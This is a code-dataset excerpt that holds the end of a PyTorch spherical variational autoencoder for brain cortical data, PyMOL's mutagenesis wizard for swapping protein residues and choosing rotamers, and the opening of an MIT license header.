the size of the stochastic latent state of the SVAE.
conv_flts: list of int
the size of convolutional filters.
fusion_level: int, default 1
at which max pooling level left and right hemisphere data
are concatenated.
"""
logger.debug("SphericalGVAE init...")
super(SphericalGVAE, self).__init__()
self.input_channels = input_channels
self.input_dim = input_dim
self.latent_dim = latent_dim
self.conv_flts = conv_flts
self.n_layers = len(self.conv_flts)
self.top_flatten_dim = int(self.input_dim / (2 ** self.n_layers))
self.top_final = self.conv_flts[-1] * self.top_flatten_dim ** 2
if fusion_level > self.n_layers or fusion_level <= 0:
raise ValueError("Impossible to use input fusion level with "
"'{0}' layers.".format(self.n_layers))
self.fusion_level = fusion_level
# define the encoder
self.enc_left_conv = nn.Sequential()
self.enc_right_conv = nn.Sequential()
self.enc_w_conv = nn.Sequential()
multi_path = True
input_channels = self.input_channels
for idx in range(self.n_layers):
if idx == self.fusion_level:
multi_path = False
input_channels *= 2
if multi_path:
output_channels = int(self.conv_flts[idx] / 2)
if idx == 0:
kernel_size = 8
pad = 3
else:
kernel_size = 4
pad = 1
lconv = IcoSpMaConv(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad)
self.enc_left_conv.add_module("l_enc_{0}".format(idx), lconv)
rconv = IcoSpMaConv(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad)
self.enc_right_conv.add_module("r_enc_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoSpMaConv(
input_channels, self.conv_flts[idx], kernel_size=4,
stride=2, pad=1)
self.enc_w_conv.add_module("enc_{0}".format(idx), conv)
input_channels = self.conv_flts[idx]
self.enc_w_dense = nn.Linear(self.top_final, self.latent_dim * 2)
# define the decoder
self.dec_w_dense = nn.Linear(self.latent_dim, self.top_final)
self.dec_w_conv = nn.Sequential()
self.dec_left_conv = nn.Sequential()
self.dec_right_conv = nn.Sequential()
input_channels = self.conv_flts[self.n_layers - 1]
if self.fusion_level == self.n_layers:
multi_path = True
input_channels = int(input_channels / 2)
else:
multi_path = False
for idx in range(self.n_layers - 1, -1, -1):
if multi_path:
if idx == 0:
kernel_size = 8
pad = 3
zero_pad = 9
output_channels = self.input_channels
else:
kernel_size = 4
pad = 1
zero_pad = 3
output_channels = int(self.conv_flts[idx - 1] / 2)
lconv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad,
zero_pad=zero_pad)
self.dec_left_conv.add_module("l_dec_{0}".format(idx), lconv)
rconv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=output_channels,
kernel_size=kernel_size, stride=2, pad=pad,
zero_pad=zero_pad)
self.dec_right_conv.add_module("r_dec_{0}".format(idx), rconv)
input_channels = output_channels
else:
conv = IcoSpMaConvTranspose(
in_feats=input_channels, out_feats=self.conv_flts[idx - 1],
kernel_size=4, stride=2, pad=1, zero_pad=3)
self.dec_w_conv.add_module("dec_{0}".format(idx), conv)
input_channels = self.conv_flts[idx - 1]
if idx == self.fusion_level:
multi_path = True
input_channels = int(input_channels / 2)
self.relu = nn.ReLU(inplace=True)
def encode(self, left_x, right_x):
""" The encoder.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
q(z | x): Normal (batch_size, <latent_dim>)
a Normal distribution.
"""
left_x = self.enc_left_conv(left_x)
right_x = self.enc_right_conv(right_x)
x = torch.cat((left_x, right_x), dim=1)
x = self.relu(x)
for mod in self.enc_w_conv.children():
x = self.relu(mod(x))
x = x.view(-1, self.top_final)
x = self.enc_w_dense(x)
z_mu, z_logvar = torch.chunk(x, chunks=2, dim=1)
return Normal(loc=z_mu, scale=z_logvar.exp().pow(0.5))
def decode(self, z):
""" The decoder.
Parameters
----------
z: Tensor (samples, <latent_dim>)
the stochastic latent state z.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
x = self.relu(self.dec_w_dense(z))
x = x.view(-1, self.conv_flts[-1], self.top_flatten_dim,
self.top_flatten_dim)
for mod in self.dec_w_conv.children():
x = self.relu(mod(x))
left_recon_x, right_recon_x = torch.chunk(x, chunks=2, dim=1)
left_recon_x = self.dec_left_conv(left_recon_x)
right_recon_x = self.dec_right_conv(right_recon_x)
return left_recon_x, right_recon_x
def reparameterize(self, q):
""" Implement the reparametrization trick.
"""
if self.training:
z = q.rsample()
else:
z = q.loc
return z
def forward(self, left_x, right_x):
""" The forward method.
Parameters
----------
left_x: Tensor (samples, <input_channels>, azimuth, elevation)
input left cortical texture.
right_x: Tensor (samples, <input_channels>, azimuth, elevation)
input right cortical texture.
Returns
-------
left_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed left cortical texture.
right_recon_x: Tensor (samples, <input_channels>, azimuth, elevation)
reconstructed right cortical texture.
"""
logger.debug("SphericalGVAE forward pass")
logger.debug(debug_msg("left cortical", left_x))
logger.debug(debug_msg("right cortical", right_x))
q = self.encode(left_x, right_x)
logger.debug(debug_msg("posterior loc", q.loc))
logger.debug(debug_msg("posterior scale", q.scale))
z = self.reparameterize(q)
logger.debug(debug_msg("z", z))
left_recon_x, right_recon_x = self.decode(z)
logger.debug(debug_msg("left recon cortical", left_recon_x))
logger.debug(debug_msg("right recon cortical", right_recon_x))
return left_recon_x, right_recon_x, {"q": q, "z": z}
| 40.628788 | 79 | 0.578827 |
e140f6ee5f31c1a4218ea968fc90d4cc71d735e8 | 29,307 | py | Python | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null | modules/pymol/wizard/mutagenesis.py | Biondilbiondo/pymol-open-source | 65232aa82f46b453cddef492d6d90cd255dcb5aa | [
"CNRI-Python"
] | null | null | null |
from __future__ import print_function
from pymol.wizard import Wizard
from pymol import cmd,editor
from chempy import io
from copy import deepcopy
import pymol
import os
import traceback
src_sele = "_mutate_sel"
bump_name = "_bump_check"
obj_name = "mutation"
frag_name = "_tmp_mut"
mut_sele = "_tmp_mut_sele"
tmp_obj2 = "_tmp_obj2"
tmp_sele1 = "_tmp_sele1"
tmp_sele2 = "_tmp_sele2"
tmp_hbonds = "_tmp_hbonds"
default_mode = "current"
default_rep = "lines"
default_hyd = 'auto'
default_dep = 'dep'
default_n_cap = 'none'
default_c_cap = 'none'
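# Map alternate protonation/charge-state residue names (e.g. HID/HIE/HIP for histidine)
# onto the canonical residue name used to look up rotamers in the library.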
_rot_type_xref = {
'GLUH' : 'GLU',
'ASPH' : 'ASP',
'ARGN' : 'ARG',
'LYSN' : 'LYS',
    'HIE' : 'HIS',
'HID' : 'HIS',
'HIP' : 'HIS'
}
class Mutagenesis(Wizard):
count = 0
cutoff = 3.5
def __init__(self,_self=cmd):
Wizard.__init__(self,_self)
cmd=self.cmd
if self.cmd.get_movie_length() > 0:
raise pymol.wizarding.WizardError('Mutagenesis Wizard cannot be used with Movie')
cmd.unpick()
self.stored = pymol.Scratch_Storage()
self.space = {'stored': self.stored}
self.bump_scores = []
self.dep = default_dep
self.ind_library = io.pkl.fromFile(os.environ['PYMOL_DATA']+
"/chempy/sidechains/sc_bb_ind.pkl")
self.load_library()
self.status = 0 # 0 no selection, 1 mutagenizing
self.bump_check = 1
self.auto_center = 1
self.error = None
self.object_name = None
self.modes = [
'current'
]
self.mode = default_mode
self.rep = default_rep
self.hyd = default_hyd
self.n_cap = default_n_cap
self.c_cap = default_c_cap
residues = list(self.ind_library.keys())
        # could extend with additional fragments manually as below
residues.extend(['GLY','ALA'])
residues.extend(['HID','HIE','HIP'])
residues.extend(['ARGN','LYSN','ASPH','GLUH'])
residues.sort()
res_copy = deepcopy(residues)
for a in res_copy:
residues.append('NT_'+a)
residues.append('CT_'+a)
self.modes.extend(residues)
self.mode_label={}
for a in self.modes:
self.mode_label[a] = ""+a
self.mode_label['current']="No Mutant"
self.selection_mode = cmd.get_setting_int("mouse_selection_mode")
cmd.set("mouse_selection_mode",1)
smm = []
smm.append([ 2, 'Mutant', '' ])
smm.append([ 1, 'No change', 'cmd.get_wizard().set_mode("current")' ])
# smm.append([ 1, 'N-Term', [] ])
# smm.append([ 1, 'C-Term', [] ])
smm.append([ 0, '', '' ])
for a in self.modes:
if a == 'current':
pass
elif a[0:3]=='NT_':
pass
# smm[2][2].append([ 1, self.mode_label[a[3:]], 'cmd.get_wizard().set_mode("'+a+'")'])
elif a[0:3]=='CT_':
pass
# smm[3][2].append([ 1, self.mode_label[a[3:]], 'cmd.get_wizard().set_mode("'+a+'")'])
else:
smm.append([ 1, self.mode_label[a], 'cmd.get_wizard().set_mode("'+a+'")'])
# group arg, lys, his, glu, asp
for lst in [ smm ]: # [ smm, smm[2][2], smm[3][2] ]:
for a in 'ARG','LYS','HID','GLU','ASP':
ix = 0
start = 0
stop = 0
for b in lst:
if start==0:
if b[1][0:]==a:
start = ix
stop = ix + 1
elif b[1][0:3]==a[0:3] or ( b[1][0:2]==a[0:2] and a[0:2]=='HI' ):
stop = ix + 1
ix = ix + 1
if start!=0 and stop!=0:
slice = lst[start:stop]
if a != 'HID':
slice2 = [slice[0] ] + [ [0,'',''] ] + slice[1:]
lst[start:stop] = [ [1, self.mode_label[a] + "... " , slice2 ] ]
else:
slice2 = [ slice[3] ] + [ [0,'',''] ] + slice[0:3]
lst[start:stop] = [ [1, self.mode_label['HIS']+ "... ", slice2 ] ]
self.menu['mode']=smm
self.reps = [
'lines',
'sticks',
'spheres',
'dots'
]
self.rep_name = {
'lines' : "Show Lines",
'sticks' : "Show Sticks",
'spheres' : "Show Spheres",
'dots' : "Show Dots",
}
self.dep_name = {
'dep' : "Backbone Depen. Rotamers",
'ind' : "Backbone Indep. Rotamers"
}
self.hyd_name = {
'auto' : "Hydrogens: Current",
'keep' : "Hydrogens: Add & Retain",
# 'polar' : "Polar Hydrogens",
'none' : "Hydrogens: Remove",
}
self.hyds = [ 'auto', 'keep', 'none' ]
self.n_cap_name = {
'none' : 'Open',
'posi' : 'NH3+',
'acet' : 'Acetyl',
}
self.n_caps = [ 'none', 'posi', 'acet' ]
self.c_cap_name = {
'none' : 'Open',
'nega' : 'COO-',
'amin' : 'Amine',
'nmet' : 'N-methyl',
}
self.c_caps = [ 'none', 'nega', 'amin', 'nmet' ]
smm = []
smm.append([ 2, 'N-Cap', '' ])
for a in self.n_caps:
smm.append([ 1, self.n_cap_name[a], 'cmd.get_wizard().set_n_cap("'+a+'")'])
self.menu['n_cap']=smm
smm = []
smm.append([ 2, 'C-Cap', '' ])
for a in self.c_caps:
smm.append([ 1, self.c_cap_name[a], 'cmd.get_wizard().set_c_cap("'+a+'")'])
self.menu['c_cap']=smm
smm = []
smm.append([ 2, 'Hydrogens', '' ])
for a in self.hyds:
smm.append([ 1, self.hyd_name[a], 'cmd.get_wizard().set_hyd("'+a+'")'])
self.menu['hyd']=smm
smm = []
smm.append([ 2, 'Representation', '' ])
for a in self.reps:
smm.append([ 1, self.rep_name[a], 'cmd.get_wizard().set_rep("'+a+'")'])
self.menu['rep']=smm
self.deps = [ 'dep', 'ind' ]
smm = []
smm.append([ 2, 'Rotamers', '' ])
for a in self.deps:
smm.append([ 1, self.dep_name[a], 'cmd.get_wizard().set_dep("'+a+'")'])
self.menu['dep']=smm
if 'pk1' in cmd.get_names('selections'):
cmd.select(src_sele,"(byres pk1)")
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.refresh_wizard()
def load_library(self):
if self.dep == 'dep':
if not hasattr(self,'dep_library'):
self.dep_library = io.pkl.fromFile(os.environ['PYMOL_DATA']+
"/chempy/sidechains/sc_bb_dep.pkl")
def set_mode(self,mode):
cmd=self.cmd
if mode in self.modes:
self.mode = mode
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_rep(self,rep):
cmd=self.cmd
if rep in self.reps:
self.rep=rep
cmd.hide("("+obj_name+")")
cmd.show('lines',obj_name) # always show lines
cmd.show(self.rep,obj_name)
cmd.refresh_wizard()
def set_c_cap(self,c_cap):
cmd=self.cmd
if c_cap in self.c_caps:
self.c_cap=c_cap
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_n_cap(self,n_cap):
cmd=self.cmd
if n_cap in self.n_caps:
self.n_cap=n_cap
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_hyd(self,hyd):
cmd=self.cmd
if hyd in self.hyds:
self.hyd=hyd
if self.status==1:
self.do_library()
cmd.refresh_wizard()
def set_dep(self,value):
cmd=self.cmd
if value!=self.dep:
self.dep = value
self.load_library()
if src_sele in cmd.get_names("all"):
self.do_library()
cmd.refresh_wizard()
def get_panel(self):
cmd=self.cmd
if int(cmd.get("mouse_selection_mode")!=1):
cmd.set("mouse_selection_mode",1)
if self.mode == 'current':
label = 'No Mutation'
else:
label = 'Mutate to '+self.mode_label[self.mode]
return [
[ 1, 'Mutagenesis',''],
[ 3, label,'mode'],
[ 3, 'N-Cap: '+self.n_cap_name[self.n_cap],'n_cap'],
[ 3, 'C-Cap: '+self.c_cap_name[self.c_cap],'c_cap'],
[ 3, self.hyd_name[self.hyd],'hyd'],
[ 3, self.rep_name[self.rep],'rep'],
[ 3, self.dep_name[self.dep],'dep'],
[ 2, 'Apply' , 'cmd.get_wizard().apply()'],
[ 2, 'Clear' , 'cmd.get_wizard().clear()'],
[ 2, 'Done','cmd.set_wizard()'],
]
def get_event_mask(self):
return Wizard.event_mask_pick + Wizard.event_mask_select + Wizard.event_mask_state
def cleanup(self):
cmd=self.cmd
global default_mode,default_rep,default_dep,default_hyd
global default_n_cap, default_c_cap
default_mode = self.mode
default_rep = self.rep
default_dep = self.dep
default_hyd = self.hyd
default_n_cap = self.n_cap
default_c_cap = self.c_cap
cmd.set("mouse_selection_mode",self.selection_mode) # restore selection mode
self.clear()
def clear(self):
cmd=self.cmd
self.status=0
self.bump_scores = []
cmd.delete(tmp_hbonds)
cmd.delete(tmp_obj2)
cmd.delete(mut_sele)
cmd.delete(src_sele)
cmd.delete(obj_name)
cmd.delete(bump_name)
cmd.delete("_seeker_hilight")
cmd.refresh_wizard()
def apply(self):
cmd=self.cmd
if self.status==1:
# find the name of the object which contains the selection
src_frame = cmd.get_state()
try:
new_name = cmd.get_object_list(src_sele)[0]
except IndexError:
print(" Mutagenesis: object not found.")
return
if True:
auto_zoom = cmd.get_setting_text('auto_zoom')
cmd.set('auto_zoom',"0",quiet=1)
if self.lib_mode!="current":
# create copy with mutant in correct frame
state = cmd.get_object_state(new_name)
cmd.create(tmp_obj2, obj_name, src_frame, state)
cmd.set_title(tmp_obj2, state, '')
cmd.color(self.stored.identifiers[4], "?%s & elem C" % tmp_obj2)
cmd.alter(tmp_obj2, 'ID = -1')
# select backbone connection atoms
cmd.select(tmp_sele1, 'neighbor ?%s' % (src_sele), 0)
# remove residue and neighboring c-cap/n-cap (if any)
cmd.remove("?%s | byres (?%s & "
"(name N & resn NME+NHH | name C & resn ACE))" % (src_sele, tmp_sele1))
# create the merged molecule
cmd.create(new_name, "?%s | ?%s" % (new_name, tmp_obj2), state, state)
# now connect them
cmd.select(tmp_sele2, '/%s/%s/%s/%s' % ((new_name,) + self.stored.identifiers[:3]))
cmd.bond('?%s & name C' % (tmp_sele1), '?%s & name N' % (tmp_sele2), quiet=1)
cmd.bond('?%s & name N' % (tmp_sele1), '?%s & name C' % (tmp_sele2), quiet=1)
cmd.set_geometry('(?%s | ?%s) & name C+N' % (tmp_sele1, tmp_sele2), 3, 3) # make amide planer
# fix N-H hydrogen position (if any exists)
cmd.h_fix('?%s & name N' % (tmp_sele2))
# delete temporary objects/selections
cmd.delete(tmp_sele1)
cmd.delete(tmp_sele2)
cmd.delete(tmp_obj2)
self.clear()
# and return to frame 1
cmd.frame(1)
cmd.refresh_wizard()
else:
# create copy with conformation in correct state
cmd.create(tmp_obj2,obj_name,src_frame,1)
# remove existing c-cap in copy (if any)
cmd.remove("byres (name N and (%s in (neighbor %s)) and resn NME+NHH)"%
(new_name,src_sele))
cmd.remove("(%s) and name OXT"%src_sele)
# remove existing n-cap in copy (if any)
cmd.remove("byres (name C and (%s in (neighbor %s)) and resn ACE)"%
(new_name,src_sele))
# save existing conformation on undo stack
# cmd.edit("((%s in %s) and name ca)"%(new_name,src_sele))
cmd.push_undo("("+src_sele+")")
# modify the conformation
cmd.update(new_name,tmp_obj2)
# cmd.unpick()
cmd.delete(tmp_obj2)
self.clear()
# and return to frame 1
cmd.frame(1)
cmd.refresh_wizard()
cmd.set('auto_zoom',auto_zoom,quiet=1)
def get_prompt(self):
self.prompt = None
if self.status==0:
self.prompt = [ 'Pick a residue...']
elif self.status==1:
self.prompt = [ 'Select a rotamer for %s or pick a new residue...'%self.res_text ]
return self.prompt
def do_library(self):
cmd=self.cmd
pymol=cmd._pymol
if not ((cmd.count_atoms("(%s) and name N"%src_sele)==1) and
(cmd.count_atoms("(%s) and name C"%src_sele)==1) and
(cmd.count_atoms("(%s) and name O"%src_sele)==1)):
self.clear()
return 1
cmd.feedback("push")
cmd.feedback("disable","selector","everythin")
cmd.feedback("disable","editor","actions")
self.prompt = [ 'Loading rotamers...']
self.bump_scores = []
state_best = 0
pymol.stored.name = 'residue'
cmd.iterate("first (%s)"%src_sele,'stored.name=model+"/"+segi+"/"+chain+"/"+resn+"`"+resi')
self.res_text = pymol.stored.name
cmd.select("_seeker_hilight",src_sele)
auto_zoom = cmd.get_setting_text('auto_zoom')
cmd.set('auto_zoom',"0",quiet=1)
cmd.frame(0)
cmd.delete(frag_name)
if self.auto_center:
cmd.center(src_sele,animate=-1)
self.lib_mode = self.mode
if self.lib_mode=="current":
pymol.stored.resn=""
cmd.iterate("(%s & name CA)"%src_sele,"stored.resn=resn")
rot_type = _rot_type_xref.get(pymol.stored.resn,pymol.stored.resn)
if (self.c_cap!='none') or (self.n_cap!='none') or (self.hyd != 'auto'):
self.lib_mode = rot_type # force fragment-based load
else:
cmd.create(frag_name,src_sele,1,1)
if self.c_cap=='open':
cmd.remove("%s and name OXT"%frag_name)
if self.lib_mode!='current':
rot_type = self.lib_mode
frag_type = self.lib_mode
if (self.n_cap == 'posi') and (frag_type[0:3]!='NT_'):
if not ( cmd.count_atoms(
"elem C & !(%s) & (bto. (name N & (%s))) &! resn ACE"%
(src_sele,src_sele))):
# use N-terminal fragment
frag_type ="NT_"+frag_type
if (self.c_cap == 'nega') and (frag_type[0:3]!='CT_'):
if not ( cmd.count_atoms("elem N & !(%s) & (bto. (name C & (%s))) & !resn NME+NHH"%
(src_sele,src_sele))):
# use C-terminal fragment
frag_type ="CT_"+frag_type
if rot_type[0:3] in [ 'NT_', 'CT_' ]:
rot_type = rot_type[3:]
rot_type = _rot_type_xref.get(rot_type, rot_type)
cmd.fragment(frag_type.lower(), frag_name, origin=0)
# trim off hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
# copy identifying information
cmd.alter("?%s & name CA" % src_sele, "stored.identifiers = (segi, chain, resi, ss, color)", space=self.space)
cmd.alter("?%s" % frag_name, "(segi, chain, resi, ss) = stored.identifiers[:4]", space=self.space)
# move the fragment
if ((cmd.count_atoms("(%s & name CB)"%frag_name)==1) and
(cmd.count_atoms("(%s & name CB)"%src_sele)==1)):
cmd.pair_fit("(%s & name CA)"%frag_name,
"(%s & name CA)"%src_sele,
"(%s & name CB)"%frag_name,
"(%s & name CB)"%src_sele,
"(%s & name C)"%frag_name,
"(%s & name C)"%src_sele,
"(%s & name N)"%frag_name,
"(%s & name N)"%src_sele)
else:
cmd.pair_fit("(%s & name CA)"%frag_name,
"(%s & name CA)"%src_sele,
"(%s & name C)"%frag_name,
"(%s & name C)"%src_sele,
"(%s & name N)"%frag_name,
"(%s & name N)"%src_sele)
# fix the carbonyl position...
cmd.iterate_state(1,"(%s & name O)"%src_sele,"stored.list=[x,y,z]")
cmd.alter_state(1,"(%s & name O)"%frag_name,"(x,y,z)=stored.list")
if cmd.count_atoms("(%s & name OXT)"%src_sele):
cmd.iterate_state(1,"(%s & name OXT)"%src_sele,"stored.list=[x,y,z]")
cmd.alter_state(1,"(%s & name OXT)"%frag_name,"(x,y,z)=stored.list")
elif cmd.count_atoms("(%s & name OXT)"%frag_name): # place OXT if no template exists
angle = cmd.get_dihedral("(%s & name N)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name C)"%frag_name,
"(%s & name O)"%frag_name)
cmd.protect("(%s & name O)"%frag_name)
cmd.set_dihedral("(%s & name N)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name C)"%frag_name,
"(%s & name OXT)"%frag_name,180.0+angle)
cmd.deprotect(frag_name)
# fix the hydrogen position (if any)
if cmd.count_atoms("(hydro and bound_to (name N & (%s)))"%frag_name)==1:
if cmd.count_atoms("(hydro and bound_to (name N & (%s)))"%src_sele)==1:
cmd.iterate_state(1,"(hydro and bound_to (name N & (%s)))"%src_sele,
"stored.list=[x,y,z]")
cmd.alter_state(1,"(hydro and bound_to (name N & (%s)))"%frag_name,
"(x,y,z)=stored.list")
elif cmd.select(tmp_sele1,"(name C & bound_to (%s and elem N))"%src_sele)==1:
# position hydro based on location of the carbonyl
angle = cmd.get_dihedral("(%s & name C)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name N)"%frag_name,
tmp_sele1)
cmd.set_dihedral("(%s & name C)"%frag_name,
"(%s & name CA)"%frag_name,
"(%s & name N)"%frag_name,
"(%s & name H)"%frag_name,180.0+angle)
cmd.delete(tmp_sele1)
# add c-cap (if appropriate)
if self.c_cap in [ 'amin', 'nmet' ]:
if not cmd.count_atoms("elem N & !(%s) & (bto. (name C & (%s))) & !resn NME+NHH"%
(src_sele,src_sele)):
if cmd.count_atoms("name C & (%s)"%(frag_name))==1:
if self.c_cap == 'amin':
editor.attach_amino_acid("name C & (%s)"%(frag_name), 'nhh')
elif self.c_cap == 'nmet':
editor.attach_amino_acid("name C & (%s)"%(frag_name), 'nme')
if cmd.count_atoms("hydro & bound_to (name N & bound_to (name C & (%s)))"%frag_name):
cmd.h_fix("name N & bound_to (name C & (%s))"%frag_name)
# trim hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
# add n-cap (if appropriate)
if self.n_cap in [ 'acet' ]:
if not cmd.count_atoms("elem C & !(%s) & (bto. (name N & (%s))) & !resn ACE "%
(src_sele,src_sele)):
if cmd.count_atoms("name N & (%s)"%(frag_name))==1:
if self.n_cap == 'acet':
editor.attach_amino_acid("name N & (%s)"%(frag_name), 'ace')
if cmd.count_atoms("hydro & bound_to (name N & bound_to (name C & (%s)))"%frag_name):
cmd.h_fix("name N & (%s)"%frag_name)
# trim hydrogens
if (self.hyd == 'none'):
cmd.remove("("+frag_name+" and hydro)")
elif (self.hyd == 'auto'):
if cmd.count_atoms("("+src_sele+") and hydro")==0:
cmd.remove("("+frag_name+" and hydro)")
cartoon = (cmd.count_atoms("(%s & name CA & rep cartoon)"%src_sele)>0)
sticks = (cmd.count_atoms("(%s & name CA & rep sticks)"%src_sele)>0)
cmd.delete(obj_name)
key = rot_type
lib = None
if self.dep == 'dep':
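            # Backbone-dependent rotamers are keyed by (residue, phi, psi) with the angles
            # rounded to progressively coarser bins (10, then 20, then 60 degrees) until a
            # matching entry is found; if none is found we fall back to the
            # backbone-independent library below.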
try:
result = cmd.phi_psi("%s"%src_sele)
if len(result)==1:
(phi,psi) = list(result.values())[0]
(phi,psi) = (int(10*round(phi/10)),int(10*(round(psi/10))))
key = (rot_type,phi,psi)
if key not in self.dep_library:
(phi,psi) = (int(20*round(phi/20)),int(20*(round(psi/20))))
key = (rot_type,phi,psi)
if key not in self.dep_library:
(phi,psi) = (int(60*round(phi/60)),int(60*(round(psi/60))))
key = (rot_type,phi,psi)
lib = self.dep_library.get(key,None)
except:
pass
if lib is None:
key = rot_type
lib = self.ind_library.get(key,None)
if (lib is not None) and self.dep == 'dep':
print(' Mutagenesis: no phi/psi, using backbone-independent rotamers.')
if lib is not None:
state = 1
for a in lib:
cmd.create(obj_name,frag_name,1,state)
if state == 1:
cmd.select(mut_sele,"(byres (%s like %s))"%(obj_name,src_sele))
if rot_type=='PRO':
cmd.unbond("(%s & name N)"%mut_sele,"(%s & name CD)"%mut_sele)
for b in a.keys():
if b!='FREQ':
cmd.set_dihedral("(%s & n;%s)"%(mut_sele,b[0]),
"(%s & n;%s)"%(mut_sele,b[1]),
"(%s & n;%s)"%(mut_sele,b[2]),
"(%s & n;%s)"%(mut_sele,b[3]),
a[b],state=state)
else:
cmd.set_title(obj_name,state,"%1.1f%%"%(a[b]*100))
if rot_type=='PRO':
cmd.bond("(%s & name N)"%mut_sele,"(%s & name CD)"%mut_sele)
state = state + 1
cmd.delete(frag_name)
print(" Mutagenesis: %d rotamers loaded."%len(lib))
if self.bump_check:
cmd.delete(bump_name)
cmd.create(bump_name,
"(((byobj %s) within 6 of (%s and not name N+C+CA+O+H+HA)) and (not (%s)))|(%s)"%
(src_sele,mut_sele,src_sele,mut_sele),singletons=1)
cmd.color("gray50",bump_name+" and elem C")
cmd.set("seq_view",0,bump_name,quiet=1)
cmd.hide("everything",bump_name)
if ((cmd.select(tmp_sele1, "(name N & (%s in (neighbor %s)))"%
(bump_name,src_sele)) == 1) and
(cmd.select(tmp_sele2, "(name C & (%s in %s))"%
(bump_name,mut_sele)) == 1)):
cmd.bond(tmp_sele1,tmp_sele2)
if ((cmd.select(tmp_sele1,"(name C & (%s in (neighbor %s)))"%
(bump_name,src_sele)) == 1) and
(cmd.select(tmp_sele2,"(name N & (%s in %s))"%
(bump_name,mut_sele)) == 1)):
cmd.bond(tmp_sele1,tmp_sele2)
cmd.delete(tmp_sele1)
cmd.delete(tmp_sele2)
cmd.protect("%s and not (%s in (%s and not name N+C+CA+O+H+HA))"%
(bump_name,bump_name,mut_sele))
cmd.sculpt_activate(bump_name)
cmd.show("cgo",bump_name)
# draw the bumps
cmd.set("sculpt_vdw_vis_mode",1,bump_name)
state = 1
score_best = 1e6
for a in lib:
score = cmd.sculpt_iterate(bump_name, state, 1)
self.bump_scores.append(score)
if score < score_best:
state_best = state
score_best = score
state = state + 1
cmd.delete(mut_sele)
else:
cmd.create(obj_name,frag_name,1,1)
print(" Mutagenesis: no rotamers found in library.")
cmd.set("seq_view",0,obj_name,quiet=1)
pymol.util.cbaw(obj_name)
cmd.hide("("+obj_name+")")
cmd.show(self.rep,obj_name)
cmd.show('lines',obj_name) #neighbor always show lines
if cartoon:
cmd.show("cartoon",obj_name)
if sticks:
cmd.show("sticks",obj_name)
cmd.set('auto_zoom',auto_zoom,quiet=1)
cmd.delete(frag_name)
cmd.frame(state_best)
# this might be redundant if frame(state_best) changed the state
self.do_state(state_best)
cmd.unpick()
cmd.feedback("pop")
def do_state(self,state):
cmd=self.cmd
if cmd.get("sculpting")=="on":
names = cmd.get_names("all_objects")
if (bump_name in names) and (obj_name in names):
cmd.update(bump_name,obj_name)
if self.bump_scores:
print(' Rotamer %d/%d, strain=%.2f' % (state,
cmd.count_states(obj_name), self.bump_scores[state - 1]))
# update hbonds (polar contacts)
cmd.delete(tmp_hbonds)
cmd.distance(tmp_hbonds,
"?{}".format(obj_name),
"(byobj ?{}) and not ?{}".format(src_sele, src_sele),
mode=2, state1=state, state2=1)
def do_select(self,selection):
print("Selected!")
cmd=self.cmd
if (obj_name in cmd.get_names()):
if cmd.count_atoms("(%s) and (%s)"%(obj_name,selection)):
cmd.deselect()
return 1
if self.status!=0:
cmd.delete(obj_name)
cmd.select(src_sele,selection)
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.delete(selection)
cmd.refresh_wizard()
cmd.deselect()
return 1
def do_pick(self,bondFlag):
print("Picked!")
cmd=self.cmd
if bondFlag:
self.error = "Error: please select an atom, not a bond."
print(self.error)
else:
if self.status!=0:
cmd.delete(obj_name)
cmd.select(src_sele,"(byres pk1)")
cmd.unpick()
cmd.enable(src_sele)
self.status = 1
self.error = None
self.do_library()
cmd.refresh_wizard()
| 39.927793 | 122 | 0.468148 |
72a799c3f3b53672f4d0be5528a7e2ca55d2566a | 1,139 | py | Python | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | user_sync/version.py | sabanawaf/user-sync.py | 51a7f9165d1740120b172edf507f1b3b3d5e57f8 | [
"MIT"
] | null | null | null | # Copyright (c) 2016-2017 Adobe Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
